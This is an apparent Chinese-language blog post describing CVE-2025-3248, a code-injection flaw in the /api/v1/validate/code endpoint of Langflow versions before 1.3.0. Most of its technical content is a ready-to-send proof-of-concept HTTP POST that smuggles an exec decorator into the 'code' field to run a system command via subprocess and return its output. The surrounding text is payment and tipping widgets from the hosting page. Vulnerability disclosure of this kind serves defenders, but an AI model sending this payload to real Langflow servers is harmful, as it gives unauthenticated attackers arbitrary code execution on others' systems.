Langflow框架远程命令执行漏洞(CVE-2025-3248)

问题描述

Langflow是Langflow开源的一个用于构建多代理和 RAG 应用程序的可视化框架。‌是一个面向开发者的低代码工具,专注于多智能体人工智能、提示工程和检索增强生成(RAG)应用的开发。它能够帮助开发者轻松构建强大的AI智能体和工作流,通过可视化方式搭建AI应用,通过拖放操作创建复杂的AI工作流,从而降低开发门槛,减少编写样板代码的工作量,使开发者能够更多地专注于创新‌。Langflow 1.3.0之前版本存在安全漏洞,该漏洞源于/api/v1/validate/code端点存在代码注入漏洞,可能导致远程未经验证的攻击者执行任意代码。

poc

POST /api/v1/validate/code HTTP/1.1
Host: 127.0.0.1
Content-Type: application/jsonContent-Length: 125

{"code": "@exec('raise Exception(__import__(\"subprocess\").check_output([\"id\"]))')\ndef foo():\n  pass"}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值